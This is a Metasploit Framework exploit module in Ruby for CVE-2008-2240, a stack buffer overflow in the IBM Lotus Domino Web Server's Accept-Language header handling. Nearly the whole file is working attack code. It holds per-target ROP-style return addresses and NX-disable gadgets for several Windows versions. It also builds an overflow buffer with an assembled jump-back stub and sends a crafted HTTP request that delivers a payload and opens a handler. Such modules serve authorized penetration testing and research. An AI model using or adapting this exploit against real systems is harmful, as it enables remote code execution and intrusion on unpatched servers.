##
# $Id: domino_http_accept_language.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'			=> 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',
			'Description'		=> %q{
					This module exploits a stack buffer overflow in IBM Lotus Domino Web Server
				prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
				request with an Accept-Language header greater than 114 bytes.
			},
			'Author'		=> [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ],
			'License'		=> MSF_LICENSE,
			'Version'		=> '$Revision: 10998 $',
			'References'		=>
				[
					['CVE', '2008-2240'],
					['OSVDB', '45415'],
					['BID', '29310'],
					['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
				],
			'DefaultOptions'	=>
				{
					'EXITFUNC'	=> 'thread',
				},
			'Privileged'		=> true,
			'Payload'		=>
				{
					'Space'			=> 800,
					'BadChars'		=> "\x00\x0a\x20\x2c\x3b",
					'StackAdjustment'	=> -3500,
				},
			'Platform'		=>	'win',
			'Targets'		=>
				[

					['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
						{
							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret	 	@fontmanager.dll
							'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
							'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
							'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dl
							'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
							'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
						}
					],

					['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
						{
							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
							'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
							'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
							'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dll
							'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
							'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
						}
					],

					['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
						{
							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
							'JmpESP'	=> 0x62c6072e, # jmp esp			@lsccstr.dll
						}
					],

					['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
						{
							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
							'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
							'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
							'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
							'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
							'JmpESP'	=> 0x6391071e, # jmp esp 			@nlsccstr.dll
						}
					],

					['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
						{
							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
							'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
							'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
							'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
							'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
							'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
						}
					],

					['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
						{
							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
							'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
						}
					],

				],
			'DisclosureDate' => 'May 20 2008'))

		register_options( [ Opt::RPORT(80) ], self.class )
	end

	def exploit
		connect

		lang = rand_text_alphanumeric(116)				# greetz to hateful chris
		lang[ 56,  4 ] = [ 0xfffffffe ].pack('V')			# Fix Second crash (esi)
		lang[ 68,  4 ] = [ 0x7ffaf0ec ].pack('V')			# Fix Second crash (eax)
		lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V')			# Fix First crash
		lang[ 112, 4 ] = [target['FixESP']].pack('V')			# 1
		lang << "\x00"
		lang << payload.encoded

		if(not target['DisableNX'])
			lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string		# 4
			lang[ 80,  4 ] = [target['JmpESP']].pack('V')		# 2
			lang[ 84,  2 ] = Rex::Arch::X86.jmp_short(-0x46)	# 3 jmp back to top
		else
			lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string	# 8
			lang[ 80,  4 ] = [target['FixESI']].pack('V')		# 2
			lang[ 84,  4 ] = [target['FixEBP']].pack('V')		# 3
			lang[ 88,  4 ] = [target['Ret']].pack('V')		# 4
			lang[ 92,  4 ] = [target['JmpESP']].pack('V')		# 6
			lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56)	# 7  jmp back to top
			lang[ 108, 4 ] = [target['DisableNX']].pack('V')	# 5
		end

		uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1)	# Trigger

		print_status("Trying target #{target.name}...")
		send_request_raw({
						'uri'			=> "#{uri}",
						'method'		=> 'GET',
						'headers'		=>
						{
							'Accept'		=> '*/*',
							'Accept-Language'	=> "#{lang}",
							'Accept-Encoding'	=> 'gzip,deflate',
							'Keep-Alive'		=> '300',
							'Connection'		=> 'keep-alive',
							'User-Agent'		=> 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
						}
					}, 5)
		handler
		disconnect
	end
end
